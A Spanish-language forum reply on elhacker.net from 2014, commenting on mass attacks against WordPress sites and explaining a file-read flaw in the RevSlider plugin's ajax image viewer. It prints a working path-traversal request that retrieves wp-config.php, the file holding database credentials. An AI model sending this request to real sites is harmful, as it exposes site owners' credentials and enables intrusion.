elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Mensajes
Páginas: [1]
1  Foros Generales / Noticias / Re: Sitios de WordPress son objeto de ataque a gran escala; 100.000 instalaciones... en: 16 Diciembre 2014, 17:13 pm
En realidad el problema está en que el visor ajax de revslider es capaz de mostrar el archivo de configuración de Wordpress o cualquier otro archivo del disco duro dándole la ruta. Es tan fácil como esto:
Código:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Algunos temas de Wordpress llevan instalado este plugin para los sliders, como "Celestino", por lo que podrías tener el plugin sin saberlo.

Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines